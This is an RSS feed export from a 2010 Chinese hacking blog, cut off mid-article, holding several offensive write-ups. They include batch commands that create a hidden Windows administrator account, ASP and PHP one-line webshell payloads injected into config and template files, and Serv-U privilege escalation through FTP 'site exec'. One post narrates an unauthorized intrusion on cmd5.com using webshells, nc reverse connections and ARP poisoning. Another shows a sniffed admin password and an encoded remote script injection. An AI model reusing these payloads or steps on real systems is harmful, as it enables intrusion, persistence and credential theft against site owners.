<?xml version="1.0" standalone="yes"?>
<?xml-stylesheet type="text/xsl" href="css/rss.xslt"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>叶子's blog - 技术文章/Article</title><link>http://yezishell.cn/</link><description>叶子的博客|关注网络安全！关注网络技术！关注SEO优化！ - </description><generator>RainbowSoft Studio Z-Blog 1.8 Walle Build 100427</generator><language>zh-CN</language><copyright>CopyRight 2009 叶子's blog　  鲁ICP备09016725号　　</copyright><pubDate>Thu, 09 Sep 2010 13:06:08 +0800</pubDate><item><title>微软全系统建立隐藏账户漏洞</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/article/405/</link><pubDate>Mon, 06 Sep 2010 22:50:53 +0800</pubDate><guid>http://yezishell.cn/article/405/</guid><description><![CDATA[<p>发布作者：only_guest<br />影响版本：微软系列<br />官方地址：www.microsft.com<br />漏洞类型：设计错误<br />漏洞描述：可以通过特殊字符建立隐藏账户.命令行界面下不显示,用户管理面板中显示为空.非$..</p><p>详细说明：可以通过智能ABC输入法中V9里的空白字符建立隐藏帐号,命令行下无法建立,可以先写个批处理,如下:<br />net user&nbsp; 123 /add<br />net localgroup administrators&nbsp; /add<br />注意其中的空白字符.非空格.<br />建立后命令行下用net user命令查看账户显示为空白,在用户界面中同样显示空白.<br />建立此帐号后无法在mstsc中直接输入登陆,需要在远程桌面的选项面板的常规选项卡中的用户名一栏里用智能ABC的V9输入特殊字符后再次连接.</p><p><br />漏洞证明：新建一个批处理,内容如下.<br />net user&nbsp; 123 /add<br />net localgroup administrators&nbsp; /add<br />执行后查看用户管理界面,看看是否有个空白帐号.<br />修复方案：过滤这些特殊字符吧.</p><div align="center"><script language="javascript" src="/AD/201005/13.js" type="text/javascript"></script><script type="text/javascript"><!--  google_ad_client = "pub-2712084202597864";  google_ad_format = "js_sdo";  google_cts_mode ="rs";  google_num_cts = "2";  google_searchbox_width = 215;  google_searchbox_height = 26;  google_link_target = 2;  google_logo_pos = "left";  google_rs_pos = "right";  google_ad_height = 35;  google_ad_width = 500;//--></script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_sdo.js"></script></div>]]></description><category>技术文章/Article</category><comments>http://yezishell.cn/article/405/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=405</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=405&amp;key=d3f40137</trackback:ping></item><item><title>双引号被过滤时一句话的插入</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/article/403/</link><pubDate>Wed, 25 Aug 2010 23:14:17 +0800</pubDate><guid>http://yezishell.cn/article/403/</guid><description><![CDATA[<p>昨日小刀刀在群里抛了一个问题，说后台插入一句话老是出错，群里的朋友出了很多主意，但是最后还是没搞定。后来这小子把问题抛给了我，昨天我就测试了一下。这里把情况介绍给大家。</p><p>一般而言，后台插一句话，如果数据库扩展名是asp的话，那么插数据库，但是如果有配置文件可以插的话，那肯定是插入配置文件了，但是插入配置文件有一个很大的风险，那就是一旦出错那么全盘皆输，有可能不仅仅造成后台无法登陆，甚至有可能是整个网站系统崩溃，所以插入配置文件，请慎之又慎。</p><p>话归正题，如果想插入配置文件，一般是config.asp，那么首先需要了解这个文件的一般情况。</p><p>网站的配置一般是保存网站名，地址，email之类的，既然是字符，那么格式应当是<br />webname=&ldquo;test website&rdquo;</p><p>对于这样的配置插入一句话的话，我们的机会就是替换test website，那么需要闭合2个&quot;，同时要插入一句话，语句可以这样</p><p>&quot;%&gt;&lt;%eval request(&quot;d&quot;%&gt;&lt;%s=&quot;</p><p>那么在config.asp中就是</p><p>webname=&ldquo; &quot;%&gt;&lt;%eval request(&quot;d&quot;%&gt;&lt;%s=&quot; &rdquo;</p><p><br />第一个&quot;是闭合前面的配置文件中的&quot;，%&gt;就是闭合前一段脚本，之后插入一句话&lt;%eval request(&quot;d&quot;%&gt;，现在要闭合原来的&quot;和%&gt;</p><p>所以加入&lt;%s=&quot;，这里特别要注意&ldquo;s=&rdquo;，如果没有这个等号的话，那么就会成&lt;%&quot; &quot;,这样必将出错。</p><p>好了，这是常规的办法，现在我们回到开始那个问题，按照前面的方法插入</p><div><img onmousewheel="return bbimg(this)" border="0" width="498" onload="resizepic(this)" height="253" alt="" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010082522065943.jpg" />&nbsp;<br /><br />插入后，我们再点击&ldquo;网站设置&rdquo; ，出现错误</div><p><img onmousewheel="return bbimg(this)" border="0" width="481" onload="resizepic(this)" height="237" alt="" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010082522071918.jpg" />&nbsp;</p><p>从这个错误，我们可以得到2个信息。</p><p>第一，配置文件的路径：http://www.target.com/zfbm/zfb/inc/config.asp</p><p>第二，网站名的变量为webname。</p><p><br />昨天由于很晚了，就没继续看，今天出差，晚上回来刚刚上Q，小刀刀就q我，说拿下了，并说这个后台过滤了双引号&quot;，结合昨天的错误一看果然是，由于我们闭合前面双引号起&quot;的那个双引号收&quot;被过滤成单引号'，所以就成了webname=&quot; '，这样的话那么这个双引号没有闭合，由于双引号是vbscript的控制符，没有闭合config.asp运行必然出错。那么我们遇到这种双引号被过滤了的情况改怎么办呢。</p><p>由于插入一句话必须要用双引号括起来，而输入双引号又被过滤，所以我们可以利用他们自身的双引号来解决。</p><p>在配置文件中，我们还可以看到这样一些设置</p><p><img onmousewheel="return bbimg(this)" border="0" width="499" onload="resizepic(this)" height="195" alt="" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010082522074075.jpg" />&nbsp;<br />就是配置网站的公告数 ，文章数等。可以假设一下，他必然是整数赋值，没有双引号包括<br />num=5<br />num是整数型，不然就成字符了num=&quot;5&quot;</p><p>那么我们的一句话就可以这样构建，如图</p><p><img onmousewheel="return bbimg(this)" border="0" width="477" onload="resizepic(this)" height="145" alt="" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010082522075486.jpg" />&nbsp;</p><p>在公告数中我们插入5%&gt;&lt;%eval request(webname)%&gt;&lt;%</p><p>必须要有5，不然将会出错，在网站名中我们插入&quot;open&quot;</p><p>由于我们没有输入双引号，不存在过滤，我们利用 配置文件本身的双引号来达到目的。那么配置文件现在的内容如下<br />&nbsp;</p><pre><ol class="dp-xml"><li class="alt"><span><span class="tag">&lt;</span><span>%&nbsp;</span></span></li><li><span>....................&nbsp;</span></li><li class="alt"><span><span class="attribute">webname</span><span>=</span><span class="attribute-value">&quot;open&quot;</span><span>&nbsp;</span></span></li><li><span><span class="attribute">num</span><span>=</span><span class="attribute-value">5</span><span>%</span><span class="tag">&gt;</span><span class="tag">&lt;</span><span>%eval&nbsp;request(webname)%</span><span class="tag">&gt;</span><span class="tag">&lt;</span><span>%&nbsp;</span></span></li><li class="alt"><span><span class="attribute">webnum</span><span>=</span><span class="attribute-value">7</span><span>&nbsp;</span></span></li><li><span>.......&nbsp;</span></li><li class="alt"><span>%<span class="tag">&gt;</span><span>&nbsp;</span></span></li></ol></pre><p>我们的一句话就相应为<br />eval request(&quot;open&quot;)，open为密码。</p><p>用菜刀成功连接</p><div><img onmousewheel="return bbimg(this)" border="0" width="340" onload="resizepic(this)" height="249" alt="" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010082522084026.jpg" />&nbsp;&nbsp;</div><p><br />从上可见，我们成功利用配置文件本身避开了一句话中双引号被过滤的问题。</p><p>那么在网页设计方面，我们可以增加过滤&lt;,%,&gt;或者组合&lt;%,%&gt;这些特殊符号，禁止这些符号的输入，那么将大大增加网页安全。</p>]]></description><category>技术文章/Article</category><comments>http://yezishell.cn/article/403/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=403</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=403&amp;key=26215ea0</trackback:ping></item><item><title>Serv-U9提权</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/article/402/</link><pubDate>Wed, 25 Aug 2010 23:12:05 +0800</pubDate><guid>http://yezishell.cn/article/402/</guid><description><![CDATA[<p>拿个SHELL提权打算C段一个服务器，用SHELL的端口扫描<br />127.0.0.1:21&nbsp;&nbsp;&nbsp; close<br />127.0.0.1:23&nbsp;&nbsp;&nbsp; close<br />127.0.0.1:80&nbsp;&nbsp;&nbsp; open<br />127.0.0.1:1433&nbsp; close<br />127.0.0.1:1521&nbsp; close<br />127.0.0.1:3306&nbsp; open<br />127.0.0.1:3389&nbsp; open<br />127.0.0.1:4899&nbsp; close<br />127.0.0.1:43958 open<br />127.0.0.1:65500 close<br />开始-运行-CMD-ftp www.XX.cn<br />C:\Documents and Settings\Administrator&gt;ftp www.XX.cn<br />Connected to www.6x9.cn.<br />220 Serv-U FTP Server v9.1 ready...<br />显示版本是Serv-U 9.1，用SHELL自带的肯定不行。网上找了个Serv-U7.8.9通杀版本，开始一切顺利执行第6步加系统用户总提示出错，这样的情况出现很多次了，觉得是不是加用户这段代码不完美，反正每次到这里我是没成功过一次</p><p><img style="zoom: 90%" onmousewheel="return bbimg(this)" border="0" width="600" onload="resizepic(this)" height="218" alt="" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010082522225960.gif" /></p><p><img style="zoom: 90%" onmousewheel="return bbimg(this)" border="0" width="600" onload="resizepic(this)" height="134" alt="" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010082522233391.jpg" /></p><p>自己反复测试各种可行想到了这个方法<br />1：用Serv-U7.8.9提权脚本添加FTP用户 不执行第6步<br />2：flashFTP或者其他FTP上传工具登陆目录FTP<br />3：上传个加用户提权BAT&nbsp;&nbsp;我这里传的C盘目录<br />ftp&gt; quote site exec c:\1.bat<br />200 EXEC command successful (TID=42).</p><p><img onmousewheel="return bbimg(this)" border="0" width="381" onload="resizepic(this)" height="234" alt="" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010082522241073.jpg" />&nbsp;&nbsp;&nbsp;</p><p>之前6.x的提权用的是反弹到本地，修改C盘为可写可执行再FTP连接quote site exec net.exe user XX XX /add<br />这里9.1执行提示没有这个文件<br />ftp&gt; quote site exec net1.exe user admin$ 9331447 /add<br />550 /C:/net1.exe: No such file.<br />试了flashFTP连接替换sethc.exe劫持没成功，可能是对SHIFT劫持接触得比较少吧。文章的这个方法我是第一次用到所以写了出来</p>]]></description><category>技术文章/Article</category><comments>http://yezishell.cn/article/402/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=402</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=402&amp;key=6c53f231</trackback:ping></item><item><title>嗅探社工渗透www.cmd5.com</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/article/400/</link><pubDate>Wed, 18 Aug 2010 20:50:17 +0800</pubDate><guid>http://yezishell.cn/article/400/</guid><description><![CDATA[<p>文章作者:黑鹰小子/BlAck.Eagle【B.H.S.T】<br />提起cmd5.com，估计安全圈子的朋友都很熟悉，笔者也非常厌烦它现在的盈利模式，比较简单的英文字母，现在也都成了收费的，于是萌发了这个邪恶的想法。<br />每次做测试的时候，笔者一般都构思下流程，这次也不例外，这种网站一般还是需要从嗅探入手，笔者准备首先利用Zwell的IIS put Scanner简单的扫描下目标网段的web服务器结构，因为它能帮助我们把很多有用的banner都扫描出来。</p><p><img onmousewheel="return bbimg(this)" border="0" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010081721264615.jpg" width="600" onload="resizepic(this)" height="485" alt="" />&nbsp;<br />笔者通过扫描，发现存在了PUT为On的一个IP，很多时候存在PUT为yes，但是上传失败，可能是webdav被禁用或者目录没有写权限。然后利用老兵的iiswrite工具写入一句话马，写入成功，然后通过&ldquo;MOVE&rdquo;来改为ASP格式，但是这时候经常出错，最后只有改为.asp;.jpg这种格式才逃脱杀软的毒手。然后通过一句话客户端，上传了很多次都是服务器500错误，木马被杀，最后通过消灭和Psjj兄弟提供的webshell，成功。</p><p><img onmousewheel="return bbimg(this)" border="0" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010081721273800.jpg" width="555" onload="resizepic(this)" height="469" alt="" />&nbsp;<br />简单看了下权限，还算比较大，通过webshell的下载功能上传了cmd，提权大杀器pr，nc。通过NC反弹到本地并且添加了一个用户，顺利添加了账户。并且成功登陆服务器。</p><p><img style="zoom: 90%" onmousewheel="return bbimg(this)" border="0" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010081721281499.jpg" width="600" onload="resizepic(this)" height="287" alt="" />&nbsp;<br />到达服务器一般是先把服务器的洞子给补上，首先将&ldquo;Web服务扩展&rdquo;中的WebDAV给禁止，然后将网站属性，主目录的写入给去掉就可以了！</p><p><img onmousewheel="return bbimg(this)" border="0" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010081721285273.jpg" width="591" onload="resizepic(this)" height="336" alt="" />&nbsp;<br />这时候，笔者才回过头来看目标站点，首先是简单ping了下cmd5.com的站点，无法ping通，然后通过ipconfig/all看了下子网掩码，发现子网掩码是255.255.255.128，哎，真的失望了，和目标不在一个网段，但是接下来，目标更加清晰了，只用到125.254.44.126去渗透一台服务器就好了，不出意外就会跟目标是同一个网段。</p><p><img onmousewheel="return bbimg(this)" border="0" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010081721292331.jpg" width="600" onload="resizepic(this)" height="418" alt="" />&nbsp;<br />说干就干，和朋友饮恨操刀上了，这时候在目标2xx网段，利用简单社工的账户进入了某php168后台，这里需要说明的是，该php168系统已经是最新版本，通过模板那里直接添加大马已经不行，写入马后，就会马上被清了，然后笔者想到了select into这种方法，但是也失败了，提示信息是服务器拒绝这个普通的mysql账户。</p><p><img onmousewheel="return bbimg(this)" border="0" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010081721302098.jpg" width="578" onload="resizepic(this)" height="377" alt="" /></p><p><img onmousewheel="return bbimg(this)" border="0" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010081721304064.jpg" width="600" onload="resizepic(this)" height="291" alt="" />&nbsp;&nbsp;<br />折腾了很久没办法，在好友Robert的提醒下，笔者打算通过添加一个普通的模板文件，<br />Template/default/none.htm，通过写入<br />&lt;script language=&quot;php&quot;&gt;phpinfo()&lt;/script&gt;<br />tested by black.eagle<br />这种文件，然后再&ldquo;系统设置&rdquo;-&ldquo;网站首页设置&rdquo;，点击提交，然后把首页生成静态页</p><p><img onmousewheel="return bbimg(this)" border="0" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010081721314233.jpg" width="585" onload="resizepic(this)" height="388" alt="" /></p><p><img onmousewheel="return bbimg(this)" border="0" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010081721320075.jpg" width="502" onload="resizepic(this)" height="566" alt="" />&nbsp;&nbsp;<br />大家可以看到oo.php确实已经执行了，但是笔者在none.htm，写为<br />&lt;script language=&quot;php&quot;&gt;<br />fputs(fopen(&quot;horind.php&quot;,&quot;w&quot;),&quot;&lt;?eval(\$_POST[cmd]);?&gt;&quot;)<br />&lt;/script&gt;<br />tested by black.eagle<br />的话，eval被过滤为了eva l写为下面这种格式的话，确实写入了，但是无法通过一句话马的客户端&ldquo;专家模式&rdquo;来执行<br />&lt;script language=&quot;php&quot;&gt;assert($_POST[cmd])&lt;/script&gt;<br />tested by black.eagle</p><p><img onmousewheel="return bbimg(this)" border="0" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010081721330595.jpg" width="600" onload="resizepic(this)" height="187" alt="" />&nbsp;<br />至此告一段落，然后在寻寻觅觅中拾得一PHPCMS后台，这个后台也没少了瞎折腾，虽说phpcms拿webshell简单，这里无法执行sql，给管理禁用了，然后通过<br />admin.php?mod=phpcms&amp;file=safe&amp;action=see_code&amp;files=eagle.php这种格式，由于写入种<br />种小马的原因没有成功，也希望各位看官以后直接上大马。</p><p><img onmousewheel="return bbimg(this)" border="0" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010081721340035.jpg" width="600" onload="resizepic(this)" height="344" alt="" />&nbsp;<br />拿到了webshell，并且这管理的疏忽，系统权限到手！</p><p><img onmousewheel="return bbimg(this)" border="0" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010081721341242.jpg" width="600" onload="resizepic(this)" height="285" alt="" />&nbsp;<br />看了下子网掩码，和cmd5.com同网段，好男儿，操刀上了！判断了网关，为.129，ping和tracert对方的IP都不通，看来有防火墙，ARP防火墙不好突破，那么只有稍微改变下cain的发包间隔，即毒化远程ARP缓存每隔19秒，默认的是30秒！</p><p><img onmousewheel="return bbimg(this)" border="0" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010081721352464.jpg" width="379" onload="resizepic(this)" height="449" alt="" />&nbsp;<br />确实也嗅探了一些账号。</p><p><img onmousewheel="return bbimg(this)" border="0" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010081721353918.jpg" width="600" onload="resizepic(this)" height="97" alt="" />&nbsp;<br />只不过，嗅探了一会机器就挂掉了，ping的时候说是目标网段不可达，笔者只能等到第二天，那么只能让IDC的客服帮我们重启下了啊，虽说是知道了，长城宽带的机房，但是不知道是哪个IDC啊，没办法，笔者先找了个该网段的站点，加了他们站长聊了下，成功获取信息。</p><p><img onmousewheel="return bbimg(this)" border="0" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010081721362506.jpg" width="578" onload="resizepic(this)" height="249" alt="" /></p><p><img onmousewheel="return bbimg(this)" border="0" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010081721371329.jpg" width="441" onload="resizepic(this)" height="629" alt="" />&nbsp;&nbsp;<br />然后通过上述获知的客服QQ，又联系上了负责该服务器的客服，等了差不多10分钟，机器就启动了，ping的时候也能通了，谢谢客服姐姐们的工作态度，此致敬礼！</p><p><img onmousewheel="return bbimg(this)" border="0" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010081721383010.jpg" width="454" onload="resizepic(this)" height="653" alt="" />&nbsp;</p><p><img onmousewheel="return bbimg(this)" border="0" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010081721391169.jpg" width="600" onload="resizepic(this)" height="166" alt="" />&nbsp;</p><p>等了些时候，获取了shell，也隐约感觉到目标可能做了CDN，因为IP变动很大。</p><p><img onmousewheel="return bbimg(this)" border="0" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010081721394146.jpg" width="591" onload="resizepic(this)" height="301" alt="" />&nbsp;<br />如果CMD5的站长看到这篇文章，请也不要发火，笔者不是有意想渗透进去，希望能成为朋友！如果有什么问题，也请大家到黑帽论坛联系我！最后还是要感谢Robert和PSJJ</p>]]></description><category>技术文章/Article</category><comments>http://yezishell.cn/article/400/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=400</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=400&amp;key=f8b1264d</trackback:ping></item><item><title>简单三步实现Windows 7自动登录</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/article/399/</link><pubDate>Wed, 11 Aug 2010 08:26:10 +0800</pubDate><guid>http://yezishell.cn/article/399/</guid><description><![CDATA[<p>现在很多的用户都已开始转向Windows 7了，对于习惯自动登录用户而言，经过简单的设置就可以实现自动登录，完全可以不通过使用第三方软件的来实现。</p><p>&nbsp;&nbsp;&nbsp; 操作过程如下：</p><p>&nbsp;&nbsp;&nbsp; 1、在开始菜单搜索框输入 &ldquo;netplwiz&rdquo; 按回车，打开高级用户控制面板；</p><p>&nbsp;<img alt="windows7 自动登入" src="http://www.bitscn.com/upimg/allimg/c091117/125T23102I0-121M.jpg" /></p><p>&nbsp;&nbsp;&nbsp; 2、在高级用户控制面板中，取消对&ldquo;要使用本机，用户需输入用户名和密码(E)&rdquo;项的勾选；</p><p>&nbsp;&nbsp;&nbsp; 3、系统将弹出窗口要求输入默认登录系统的用户名和密码，输入完成后点击确定；</p><p><a href="http://www.bitscn.com/upimg/allimg/c091117/125T231035P-2F42.jpg"><img alt="windows 7 自动登入" src="http://www.bitscn.com/upimg/allimg/c091117/125T231035P-2F42.jpg" /></a></p><p>&nbsp;&nbsp;&nbsp; 4、重启Windows 7，即可发现系统自动以默认用户登录。</p><p>&nbsp;&nbsp;&nbsp; 注：由于Windows 7与Vista的核心相差不大，此方法对Vista同样适用。</p><p>&nbsp;</p>]]></description><category>技术文章/Article</category><comments>http://yezishell.cn/article/399/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=399</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=399&amp;key=288131ba</trackback:ping></item><item><title>WinSock嗅探虚拟主机拿站取webshell</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/article/398/</link><pubDate>Sat, 07 Aug 2010 22:10:57 +0800</pubDate><guid>http://yezishell.cn/article/398/</guid><description><![CDATA[<p>感觉这些够无聊的，没点新意不说，好像还觉得有点白痴 - - 所以文章我本来就没打算写。不过既然有人帮我写了，我就发出来吧。其实我拿到虚拟主机管理员密码的步骤是。。。。。。<br />PS:这工具过几天在本文里放出呵。因为最近考试，博客七月前不更新了，七月放假了我在回来完善博客程序<br />过程是我搞的，但是当时我没截图，所以小酷同学整理出来的这个文章时间就有点对不上，不过确实是这么个步骤<br />首先是嗅探工具，asp的虚拟一般都支持aspx（少数不支持的忽略哈），那么用C#调用winsock嗅探下80端口、顺便连ftp和SMTP端口一起监听了吧。<br />第一步，随便旁注拿下asp虚拟主机上的一个网站，上传aspx的工具（工具我会随后发上来的）如图：</p><p><img onmousewheel="return bbimg(this)" border="0" src="http://yezishell.cn/upload/2010/8/201008072211297281.jpg" width="496" onload="resizepic(this)" height="407" alt="" />&nbsp;</p><p>这个虚拟主机还算不错，才三分钟，就Packets: 260这么多包了<br />一个通宵抓包，好了，该分析日志了。<br />日志下载下来，因为虚拟主机，监听的是整个服务器，信息量太大，只能有选择的分析，搜索admin、pass、user、login等等有选择的看包。<br />从抓包中发现，很多人在暴力猜解ftp密码。。。晕，这是何苦呢<br />搜索admin这一关键词时有这么一个部分引起了我的注意，如图：</p><p><img onmousewheel="return bbimg(this)" border="0" src="http://yezishell.cn/upload/2010/8/201008072211306802.jpg" width="566" onload="resizepic(this)" height="206" alt="" /></p><p>目录是admin下的文件，而且还有Cookie。。。很明显。呵呵<br />再看往下：<br />POST: /Admin/sent.asp HTTP/1.1</p><p>Via: 1.0 PROXY</p><p>Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG</p><p>Referer: http://www.xxx.com/Admin/sent.asp</p><p>Content-Type: application/x-www-form-urlencoded</p><p>User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)</p><p>Host: www.xxx.com</p><p>Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*</p><p>Accept-Language: zh-cn</p><p>UA-CPU: x86</p><p>Pragma: no-cache</p><p>Connection: Keep-Alive</p><p>Content-Length: 13</p><p>pass=buqiuren</p><p>慢慢来看，无关的跳过了哈</p><p>POST: /Admin/sent.asp</p><p>发送指令到admin目录的sent.asp</p><p>Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG</p><p>这个不用解释了吧，用session，session似乎不能像Cookie那样欺骗，能我也不会</p><p>Referer: http://www.xxx.com/Admin/sent.asp</p><p>完整的url估计就是这个不错了，打开看看。居然是webshell<br />这下就更省事了</p><p><img onmousewheel="return bbimg(this)" border="0" src="http://www.176ku.com/anquan/UploadFiles_3093/201008/2010080608540611.jpg" width="561" onload="resizepic(this)" height="392" alt="" /></p><p>&nbsp;好了，继续往下看：</p><p>User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)</p><p>反正不是我机器上的<br />下面的越看越无聊，直接跳到最后：</p><p>pass=buqiuren</p><p>输入密码：buqiuren即可登录</p><p><img onmousewheel="return bbimg(this)" border="0" src="http://yezishell.cn/upload/2010/8/201008072211521754.jpg" width="424" onload="resizepic(this)" height="422" alt="" />&nbsp;</p><p>下面就是批量清马，清理找webshell了<br />PS：做人要积德，挂马盗号这样的无德无良的事情最好不要干，修复漏洞，留张条就行了。罪过啊罪过<br />look，挂马的信息也抓出来了。。。。好无聊</p><p>POST /Admin/sent.asp?Action=plgm&amp;code=&lt;script%20src=http://%25%37%39%2E%73%25%36%39%6E%25%36%31%25%33%31%25%33%36%33%25%32%45%25%36%39%25%36%45%66%25%36%46&gt;&lt;/script&gt; HTTP/1.1</p><p>Via: 1.0 PROXY</p><p>Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG</p><p>Referer: http://www.xxx.com/Admin/sent.asp?Action=plgm&amp;code=&lt;script%20src=http://%25%37%39%2E%73%25%36%39%6E%25%36%31%25%33%31%25%33%36%33%25%32%45%25%36%39%25%36%45%66%25%36%46&gt;&lt;/script&gt;</p><p>Content-Type: application/x-www-form-urlencoded</p><p>User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)</p><p>Host: www.xxx.com</p><p>Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*</p><p>Accept-Language: zh-cn</p><p>UA-CPU: x86</p><p>Pragma: no-cache</p><p>Connection: Keep-Alive</p><p>Content-Length: 153</p>]]></description><category>技术文章/Article</category><comments>http://yezishell.cn/article/398/#comment</comments><wfw:comment>http://yezishell.cn/</wfw:comment><wfw:commentRss>http://yezishell.cn/feed.asp?cmt=398</wfw:commentRss><trackback:ping>http://yezishell.cn/cmd.asp?act=tb&amp;id=398&amp;key=164e5a17</trackback:ping></item><item><title>cain教程-C段嗅探大杀器</title><author>250048111@qq.com (yezi)</author><link>http://yezishell.cn/article/397/</link><pubDate>Sun, 01 Aug 2010 21:12:37 +0800</pubDate><guid>http://yezishell.cn/article/397/</guid><description><![CDATA[<p><font size="2"><span>Cain &amp; Abel </span><span>是由</span><span>Oxid.it</span><span>开发的一个针对</span><span>Microsoft</span><span>操作系统的免费口令恢复工具。号称穷人使用的</span><span style="color: black; font-size: 10pt">L0phtcrack</span><span style="color: black; font-size: 10pt">。</span><span>它的功能十分强大，可以网络嗅探，网络欺骗，破解加密口令、解码被打乱的口令、显示口令框、显示缓存口令和分析路由协议，甚至还可以监听内网中他人使用</span><span>VOIP</span><span>拨打电话。</span></font></p><div id="artarea_128036981926903784237679792273" class="update"><div id="content_128036981926903784237679792273" class="content feedupdatecontent"><div id="artfull_128036981926903784237679792273" class="fullmode" maxwidth="922" qmanimation_play="|expand"><div id="fullcontent_128036981926903784237679792273" class="fulltext"><div class="cnt"><div class="cnt"><p style="margin: 0cm 0cm 0pt"><font size="2"><font color="#000000"><span style="color: black; font-size: 9pt">Abel </span><span style="color: black; font-size: 9pt">是后台服务程序，一般不会用到，我们重点来介绍</span><span style="color: black; font-size: 9pt">Cain</span><span style="color: black; font-size: 9pt">的使用。</span></font></font></p><p style="margin: 0cm 0cm 0pt"><font size="2"><font color="#000000"><span>Cain</span><span>安装：首先我们需要安装</span><span>Winpcap</span><span>驱动，</span></font></font></p><div forimg="1"><font color="#000000" size="2"><img style="zoom: 90%" onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114485042.jpg" width="480" onload="javascript:contentimage(this);" height="375" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102056734.jpg" alt="" /></font></div><p style="margin: 0cm 0cm 0pt">&nbsp;</p><p style="margin: 0cm 0cm 0pt"><font size="2"><font color="#000000"><span>一路</span><span>next</span><span>下去就可以安装成功了</span></font></font></p><p style="margin: 0cm 0cm 0pt">&nbsp;</p><div forimg="1"><font color="#000000" size="2"><img onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114492183.jpg" width="480" onload="javascript:contentimage(this);" height="375" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102058621.jpg" alt="" /></font></div><p style="margin: 0cm 0cm 0pt">&nbsp;</p><p style="margin: 0cm 0cm 0pt"><font size="2"><font color="#000000"><span>然后我们就可以使用</span><span>Cain</span><span>了，让我们打开传说中的</span><span>Cain</span><span>，界面十分简单明了，</span></font></font></p><p style="margin: 0cm 0cm 0pt">&nbsp;</p><div forimg="1"><font color="#000000" size="2"><img onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114494124.jpg" width="322" onload="javascript:contentimage(this);" height="254" fcksavedurl="/uploadfile/2010-07-29/hacknote.com102058371.jpg" alt="" /></font></div><p style="margin: 0cm 0cm 0pt">&nbsp;</p><p style="margin: 0cm 0cm 0pt"><span><font color="#000000" size="2">但是它的功能可就不简单了。</font></span></p><span><p style="margin: 0cm 0cm 0pt"><font size="2"><font color="#000000"><span>Cain</span><span>使用：</span></font></font></p><p style="margin: 0cm 0cm 0pt"><font size="2"><font color="#000000"><span>一、读取缓存密码</span><span>：切换到&ldquo;受保护的缓存口令&rdquo;标签，点上面的那个加号</span></font></font></p><p style="margin: 0cm 0cm 0pt">&nbsp;</p><div forimg="1"><font color="#000000" size="2"><img onmousewheel="return cgimg(this);" src="http://yezishell.cn/upload/2010/8/201008012114498688.jpg" 